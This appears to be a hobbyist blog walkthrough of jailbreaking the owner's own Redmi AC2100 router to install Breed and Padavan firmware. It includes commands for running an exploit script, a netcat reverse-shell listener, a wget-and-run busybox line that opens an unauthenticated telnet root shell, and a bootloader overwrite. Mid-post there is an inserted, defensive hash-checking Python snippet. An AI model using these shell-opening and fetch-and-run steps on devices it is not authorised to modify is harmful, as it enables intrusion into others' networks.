Redmi AC2100 router flashed with third-party firmware

This post details the steps I went through to flash Xiaomi’s Redmi AC2100 router with a third-party firmware. There are already excellent guides out there, so I won’t try to reinvent the wheel. Instead I will focus on the differences for my circumstances where necessary. I will also list the resources that I have followed closely at the end of the post.

Although the AC2100 is neither a high-end product (Xiaomi has been releasing budget-friendly WiFi-6 routers since the end of 2019) nor a new one, what got me initially interested in this particular wireless router was the relative ease with which people are able to flash third-party firmware onto it. Contrary to some negative online reviews regarding Xiaomi’s wireless routers, I have not had any issues using Xiaomi’s firmware in the past. My two main reasons for changing the firmware are

  1. Increase the WiFi transmit power by enabling a region setting (e.g. selecting USA instead of China); Xiaomi’s firmware for China-only products has no region setting at all.
  2. Enable 160 MHz channel width on 5 GHz WiFi, which is disabled by default in the stock firmware.

First, here is my environment.

  • Macbook Pro: macOS 10.14.6
  • System Python version: 2.7.16
  • Homebrew installed https://brew.sh/
  • Redmi AC2100 factory version: 1.0.14

Preparations

Software for Macbook

The needed tools are Python 3, scapy (a Python library), netcat and telnet. As macOS comes with Python 2.x by default, I highly recommend installing Python 3 using pyenv from Homebrew and not touching any system files. Here is a recommendation on how to manage multiple Python versions: https://opensource.com/article/19/5/python-3-default-mac. Netcat and telnet can also be installed using Homebrew.

Python 2 won’t work!

$ brew install pyenv
# to install Python 3.7.8
$ pyenv install 3.7.8
# set Python 3.7.8 as global version
$ pyenv global 3.7.8
# install scapy
$ pip install scapy

Binaries/scripts to download

  • Simulate a PPPoE service: PPPoE_Simulator.py. I have tried both [1] and [2] and there didn’t seem to be any differences; I ended up using the file from [1]. The interface in the script needs to be changed to your network device, which you can find out using ifconfig after changing the default IP address.
  • The exploit to enable the reverse shell: cve.py. I used the file from [1]. The interface needs to be changed to your network device as well.
  • Simple shell to install on router: busybox. I used the file from [2] but the version from [1] probably will work too.
  • Bootloader to replace Xiaomi’s, for easy switching of firmware: breed-mt7621-xiaomi-r3g.bin from https://breed.hackpascal.net/ (AC2100 uses MTK 7621). Here is an explanation of Breed in English https://ltehacks.com/viewtopic.php?f=21&t=779
  • Padavan firmware to be loaded from inside Breed, RM2100.trx from https://github.com/hanwckf/rt-n56u (This is based on Asus firmware AFAIK).

Connect router to PC

  1. Connect Macbook to the router in a particular configuration – need 2 ethernet cables, see either [1] or [2].
  2. Disable WiFi.
  3. Set Macbook’s IP manually to 192.168.31.177, Net mask 255.255.255.0, Gateway 192.168.31.1. Check the network interface with this IP address – this will be the interface to set to in the two Python scripts.
  4. Some guides have mentioned needing to reset the router. My experience is that it is unnecessary at this stage.

Flashing firmware

  • Open a terminal session. Start PPPoE service locally.
$ sudo python PPPoE_Simulator.py

Go into the AC2100’s settings at http://192.168.31.1 and change the connection method to PPPoE, using 123 as both username and password (actually any random strings will do). Connection messages should appear in the PPPoE_Simulator.py terminal very shortly.

  • Open another terminal session and start a local HTTP server in the same folder where busybox and Breed were downloaded to. This is what will later transfer the files to the router.
$ python -m http.server 8081
  • Open a third terminal session. Start netcat listening on port 31337.
$ netcat -nvlp 31337
  • Open one more terminal session to run the exploit.
$ sudo python cve.py

Once the message “Sent 1 packets” appears here, check whether the netcat session window indicates a connection from 192.168.31.1. If nothing appears, your router may have a different MAC address from the one specified in the script. Check the following line in cve.py, because I spent a good three hours pulling my hair out just because I missed this small step!

# cve.py: the source MAC check must match your own router's MAC address
if src.startswith("change to your router mac"):

Because the connection can be unstable, which means the netcat listener and cve.py may need to be rerun multiple times, I suggest copying the following line so it is ready to paste into the netcat session as soon as the “connection…” message appears. If everything proceeds correctly you will see busybox being downloaded onto the router and its permissions set.

cd /tmp && wget http://192.168.31.177:8081/busybox && chmod a+x ./busybox && ./busybox telnetd -l /bin/sh
  • Open another terminal session and telnet into the router at 192.168.31.1. The HTTP server from the earlier step must still be running in the folder where Breed was downloaded to.
$ telnet 192.168.31.1
# run the following on the router
cd /tmp
wget http://192.168.31.177:8081/breed-mt7621-xiaomi-r3g.bin && nvram set uart_en=1 && nvram set bootdelay=5 && nvram set flag_try_sys1_failed=1 && nvram commit
mtd -r write breed-mt7621-xiaomi-r3g.bin Bootloader

The last line replaces Xiaomi’s bootloader with Breed. The router should now reboot.
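The `mtd -r write` step above overwrites the bootloader with whatever the router fetched from the HTTP server, so the files in that folder are worth checking before they are served. This is an added example, not code from the post or from the Breed/busybox projects: a drop-in replacement for the plain `python -m http.server 8081` step that refuses to start unless the SHA-256 of each artifact matches a digest you supply (the digest values below are placeholders; the file names are the ones used in the post).

```python
import hashlib
import os
import sys
from functools import partial
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

# Expected SHA-256 digests of the files the router will fetch. These are
# PLACEHOLDERS: replace them with the digests published alongside the Breed
# image and busybox binary you actually downloaded (assumption: you have them).
EXPECTED = {
    "busybox": "<sha256 of the busybox binary you downloaded>",
    "breed-mt7621-xiaomi-r3g.bin": "<sha256 of the Breed image you downloaded>",
}


def sha256_of(path, chunk=1 << 16):
    """Hash a file in chunks so large images do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def verify_artifacts(directory, expected):
    """Return (filename, problem) for every artifact that is missing or whose
    digest differs from the expected one; an empty list means all files verify."""
    problems = []
    for name, digest in expected.items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            problems.append((name, "missing"))
            continue
        actual = sha256_of(path)
        if actual != digest.lower():
            problems.append((name, "sha256 mismatch: got %s" % actual))
    return problems


def serve_if_verified(directory, expected, port=8081):
    """Start the HTTP server that feeds the router only if every artifact verifies."""
    problems = verify_artifacts(directory, expected)
    if problems:
        for name, why in problems:
            print("NOT serving: %s (%s)" % (name, why), file=sys.stderr)
        return False
    handler = partial(SimpleHTTPRequestHandler, directory=directory)
    with ThreadingHTTPServer(("0.0.0.0", port), handler) as httpd:
        print("serving verified files from %s on port %d" % (directory, port))
        httpd.serve_forever()
    return True


if __name__ == "__main__":
    sys.exit(0 if serve_if_verified(os.getcwd(), EXPECTED) else 1)
```

Run it with `sudo` only if you also need the privileged ports; port 8081 does not, so a plain `python serve_verified.py` from the download folder is enough.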

  • Login to http://192.168.31.1 to check if the router is working normally.
  • Reset the router. This will set the router to boot into Breed.
  • Change network interface on Macbook to obtain IP via DHCP.
  • Log in to http://192.168.1.1 and select firmware update (固件更新) and proceed to flash Padavan.
  • Log in to Padavan at http://192.168.2.1 using admin/admin.

Resources

  1. Instructions from the official OpenWrt site: https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100
  2. Another good set of instructions for installing OpenWrt, with many screenshots: https://github.com/impulse/ac2100-openwrt-guide
  3. Instructions for installing Breed from the well-known Chinese software-router forum: https://www.right.com.cn/forum/thread-4008447-1-1.html
